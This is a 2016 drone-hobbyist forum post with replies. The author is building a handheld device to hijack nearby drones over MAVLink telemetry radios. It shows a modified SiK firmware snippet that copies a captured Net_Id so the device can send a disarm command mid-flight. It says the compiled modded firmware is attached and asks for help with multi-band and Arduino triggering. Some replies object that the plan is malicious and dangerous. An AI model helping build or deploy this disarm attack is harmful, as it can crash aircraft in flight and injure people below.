HopeRF-TRP 3DR MavLink Attack


Project Status;          Design

Project Progress;       [∎∎∎                       ]


Once the project is complete i will be publishing it here


My write-up on my Blog www.googlex.co.uk/blog...


Hello DiyDrone.com Community!


My name is Jack and i'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MavLink Protocol.

First off the Exploit;

The exploit is to do with the radio's method of authentication, They use the header 'Net_Id' to identify themselves to the other radio's during transmission of data.

Within the Sik-Firmware for the SiLabs Si1000 ISM Radio thier is a file named "radio.c" within this file thier is some code that pulls the devices 'Net_Id' and checks it against incoming data packets to check if they are ment for the radio that is recieving them.

This is the original code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
debug("netid %x %x\n",
(unsigned)gout[0],
(unsigned)gout[1]);
goto failed;
}

However some guy has been able to modify this code so that when the radio receives a data packet it reads it's 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received, then the radio is able
to issue a command to the drone that it has just stolen the 'Net_Id' from such as "CMD_DISARM" witch would intern disarm the drone mid-flight!

Here is the "Modified" Code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
/* Mod */
// Set our radio to use the captured packets
NetID param_set(PARAM_NETID, gout[0]))
// Save the value to flash
param_save();
// To read the new value we need to reboot. Rebooting
RSTSRC |= (1 << 4);
/* End of Mod*/
}

My problem(s) are as follows.

I Can't compile the modded firmware as all of my Linux computers refuse to install Mono-Develop :/
I would like to have this running on a standalone Hope-RF HM-TRP 433 chip that is connected to an arduino, The arduino would have a display that when a button is pressed the display shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!" and the arduino would use Serial.Send() to send the command to the Hope-RF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the Hope-RF HM-TRP chip! I read somewhere that an arduino Uno could be used however i have lost that link :(
I Have NO Arduino experience so i don't even know how i would start coding something like this


And now for my Questions!
1. Can i link several HopeRF HM-TRP Modules together?? What i mean by this is could i possibly have 434/868/915 Modules with the modded code all linked to together with the Tx and Rx pins and the same power source (DUH with different antennas) so that when the button is pressed no matter what telemetry band the drone is using it WILL cover it?
2. Can someone please send me in the right direction on how i can achieve what i have asked above with an arduino??

All help is greatly appreciated!

Links to prior Research

http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent-it/

https://github.com/Dronecode/SiK

http://www.shellntel.com/blog/2015/9/25/drone-code-execution

http://rc-fpv.pl/viewtopic.php?t=8011

Obviously i am not doing this in malicious intent... ;)

Thanks a lot guys!!!

Peace out ~Jack

<-------------------------------- UPDATE-1 ----------------------------------->

Having Second thoughts on how i should do this,

I am pondering as to weather i should use an android tablet with the usb OTG wire.

This way (As Andre K pointed out) I would be showing more skills as i am a confident android developer so i could possibly make my own app that gives me a multitude of functions such as Follow me, Disable, Manual Control, RTH//RTL, Set new home and go their also i could do flight mode change. I think this would possibly help me demonstrate more skills?

What do you guys think? Start you response with UPDATE-1 ;)

~Jack

<------------------------------ UPDATE-1 END ------------------------------->

<-------------------------------- UPDATE-2 ----------------------------------->

Finally getting somewhere!

A HUGE Thanks to Marcin Krawczyk for recommending Fedora to me!

I Have finally got the HRM_TRP firmware package compiled :)

It is attached below, This is the Fw WITH the mod :)

LINK TO FW FILE  <-- Not the correct upload!

I pulled an all niter doing this :S

~Jack

===

SUB UPDATE!

I accidentally uploaded the wrong file, this is the full dst output file :)

LINK TO FW FILE

===

<------------------------------ UPDATE-2 END ------------------------------->


By Jack Rogers


© InkyHacker 2016


hm_trp.zip

Firmware.zip

You need to be a member of diydrones to add comments!

Join diydrones

Email me when people reply –

Replies

                  • <Sarcasm>

                    Wooo I LOVE LINUX!

                    </Sarcasm>

                    Crashed every time (3 times) when i tried to compile >:(

                    Now installing it all on a physical machine instead of using a VM :)

    • I MEANT UART NOT SERIAL ;/

  • I think there's nothing to exploit as the firmware has been designed without security in mind. The NET ID's are not for security reasons.

    While the lack of security might be a concern it's not by accident - it is entirely intentional. Choose another topic for your project.

    • I agree, depending of the knowledge/skills level you wish to demonstrate, the project may be too easy.

      The main reason behind the lack of security, is that the radio does not have a lot of processing power, so proper encryption, with fast recovery and ability to handle packet loss is difficult to implement.

  • This attempt is way too malicious to be necessary to demonstrate a security risk as a part of a project.

    No decent white-hat hacker would contribute to posting anything like the descrioptions says in working condition, as it's simply an overkill for purposes other than evil :)

    You can prove your point by just issuing a harmless command, or changing an unimportant parameter by 5% , no need for multiple frequencies and disarming.

    I have been contacted by several people with big commercial ideas for similar "drone-inhibiting" devices, the main problem is that nobody with such device actually knows the difference between legal/approved operations and the other, and midair disarming/even LAND may just as well cause more dangerous situations that continued flight.

  • You should talk with Tridge directly.
    • Sorry for sounding dumb here, But who is Tridge?

      ~Jack

      • https://en.m.wikipedia.org/wiki/Andrew_Tridgell
        His nickname is Tridge, He's the father of SiK firmware and APM mentor ;-) and leading developer.
        Andrew Tridgell
        Andrew "Tridge" Tridgell (born 28 February 1967) is an Australian computer programmer. He is the author of and a contributor to the Samba file serve…
        • Hmmm i see, Now how would one go about contacting him i wonder??

          • I have notified him about this thread. :)

This reply was deleted.

Activity

DIY Robocars via Twitter
RT @chr1sa: Donkeycar 4.4 released with tons of new features, including path learning (useful with GPS outdoors), better Web and Lidar supp…
Nov 27, 2022
DIY Robocars via Twitter
RT @NXP: We are already biting our nails in anticipation of the #NXPCupEMEA challenge! 😉 Did you know there are great cash prizes to be won…
Nov 24, 2022
DIY Robocars via Twitter
RT @gclue_akira: レースまであと3日。今回のコースは激ムズかも。あと一歩 #jetracer https://t.co/GKcEjImQ3t
Nov 24, 2022
DIY Robocars via Twitter
UC Berkeley's DIY robocar program https://roar.berkeley.edu/
Nov 24, 2022
DIY Robocars via Twitter
RT @chr1sa: The next @DIYRobocars autonomous car race at @circuitlaunch will be on Sat, Dec 10. Thrills, spills and a Brazilian BBQ. Fun…
Nov 24, 2022
DIY Robocars via Twitter
RT @arthiak_tc: Donkey car platform ... Still training uses behavioral cloning #TCXpo #diyrobocar @OttawaAVGroup https://t.co/PHBYwlFlnE
Nov 20, 2022
DIY Robocars via Twitter
RT @emurmur77: Points for style. @donkeycar racing in @diyrobocars at @UCSDJacobs thanks @chr1sa for taking the video. https://t.co/Y2hMyj1…
Nov 20, 2022
DIY Robocars via Twitter
RT @SmallpixelCar: Going to @diyrobocars race at @UCSDJacobs https://t.co/Rrf9vDJ8TJ
Nov 8, 2022
DIY Robocars via Twitter
RT @SmallpixelCar: Race @diyrobocars at @UCSDJacobs thanks @chr1sa for taking the video. https://t.co/kK686Hb9Ej
Nov 8, 2022
DIY Robocars via Twitter
RT @PiWarsRobotics: Presenting: the Hacky Racers Robotic Racing Series in collaboration with #PiWars. Find out more and register your inter…
Oct 23, 2022
DIY Robocars via Twitter
RT @Hacky_Racers: There will be three classes at this event: A4, A2, and Hacky Racer! A4 and A2 are based around UK paper sizing and existi…
Oct 23, 2022
DIY Robocars via Twitter
Oct 23, 2022
DIY Robocars via Twitter
Oct 19, 2022
DIY Robocars via Twitter
Oct 18, 2022
DIY Robocars via Twitter
RT @NeaveEng: Calling all UK based folks interested in @diyrobocars, @f1tenth, @donkey_car, and similar robot racing competitions! @hacky_r…
Oct 13, 2022
DIY Robocars via Twitter
RT @araffin2: 🏎️ After hours of video editing, I'm happy to share a best of my Twitch videos on learning to race with RL. 🏎️ Each part is…
Oct 13, 2022
More…